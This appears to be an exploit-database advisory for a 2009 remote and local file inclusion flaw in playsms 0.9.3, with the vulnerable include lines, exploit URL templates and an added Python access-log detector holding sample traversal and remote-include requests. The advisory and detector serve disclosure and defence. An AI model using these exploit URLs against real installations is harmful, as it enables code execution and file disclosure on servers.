vendor: playsms
by: ahmadbady
CVSS: 7.5 HIGH
Remote File Inclusion/Local File Inclusion
CWE: 94
Product Name: playsms
Affected Version From: playsms 0.9.3
Affected Version To: playsms 0.9.3
Patch Exists: YES
Related CWE: N/A
CPE: a:playsms:playsms:0.9.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

RFI/LFI

playsms 0.9.3 is vulnerable to Remote File Inclusion/Local File Inclusion. The application builds include paths from user-supplied input without proper sanitization. By manipulating the 'apps_path[plug]', 'gateway_module', 'apps_path[themes]', 'themes_module' and 'apps_path[libs]' parameters in the 'plugin/gateway/gnokii/init.php', 'plugin/themes/default/init.php' and 'lib/function.php' scripts, an attacker can include arbitrary files from remote and local resources.

Mitigation:

Input validation should be used to prevent Remote File Inclusion/Local File Inclusion attacks.
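
A detection check for the requests described above, as an added example that is not part of the original advisory or of playsms: it scans web-server access-log lines for requests to the three scripts that carry the listed parameters in the query string. The log format (Apache combined), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script path suffix -> parameters that reach its include lines (per the advisory).
WATCHED = {
    "/plugin/gateway/gnokii/init.php": {"apps_path[plug]", "gateway_module"},
    "/plugin/themes/default/init.php": {"apps_path[themes]", "themes_module"},
    "/lib/function.php": {"apps_path[libs]"},
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.\-]*://")

# Constructed sample lines (documentation addresses and hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2009:10:00:00 +0000] "GET /sms/plugin/gateway/gnokii/'
    'init.php?apps_path%5Bplug%5D=http://host.example/a%3F HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/Jan/2009:10:00:05 +0000] "GET /sms/plugin/themes/default/'
    'init.php?themes_module=../../../tmp/x%00 HTTP/1.1" 200 0',
    '192.0.2.77 - - [06/Jan/2009:10:01:00 +0000] "GET /sms/index.php?app=menu HTTP/1.1" 200 90',
]


def classify(value):
    """Label the decoded parameter value: remote URL, path traversal, or plain override."""
    v = value.lower()
    if SCHEME_RE.match(v) or v.startswith(("data:", "//", "\\\\")):
        return "remote"
    if ".." in v or v.startswith("/") or "\x00" in v:
        return "traversal"
    # These variables are meant to be set by the application, so any
    # request-supplied value is worth reviewing even if it looks harmless.
    return "override"


def inspect_line(line):
    """Return (script, parameter, kind) for each watched parameter in one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    raw_path, _, query = m.group(1).partition("?")
    path = unquote(raw_path)
    return [
        (script, key, classify(value))
        for script, params in WATCHED.items() if path.endswith(script)
        for key, value in parse_qsl(query, keep_blank_values=True) if key in params
    ]


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry))
```

Parameters sent in a POST body or cookie do not appear in the access log, so this covers query-string requests only.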

Exploit-DB raw data:

                                                              ==:RFI/LFI:==


=====================
script:playsms 0.9.3

==========================================================================
download from:http://downloads.sourceforge.net/playsms/playsms-0.9.3.tar.gz?modtime=1211284086&big_mirror=0
   
==========================================================================
vul1: /plugin/gateway/gnokii/init.php lin 2 , 3;

2 include "$apps_path[plug]/gateway/$gateway_module/config.php";
3 include "$apps_path[plug]/gateway/$gateway_module/fn.php";

==========================================================================
vul2: /plugin/themes/default/init.php lin 2 , 3;

2 include $apps_path[themes]."/".$themes_module."/config.php";
3 include $apps_path[themes]."/".$themes_module."/fn.php";

==========================================================================
vul3: /lib/function.php lin 4 and...

lin4 include "$apps_path[libs]/fn_auth.php";

==========================================================================

xpl:
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?apps_path[plug]=[Rfi]?
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?gateway_module=[Lfi]

http://127.0.0.1/path/plugin/themes/default/init.php?apps_path[themes]=[Rfi]?
http://127.0.0.1/path/plugin/themes/default/init.php?themes_module=[Lfi]

http://127.0.0.1/path/lib/function.php?apps_path[libs]=[Rfi]?
==========================================================================
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-01-06]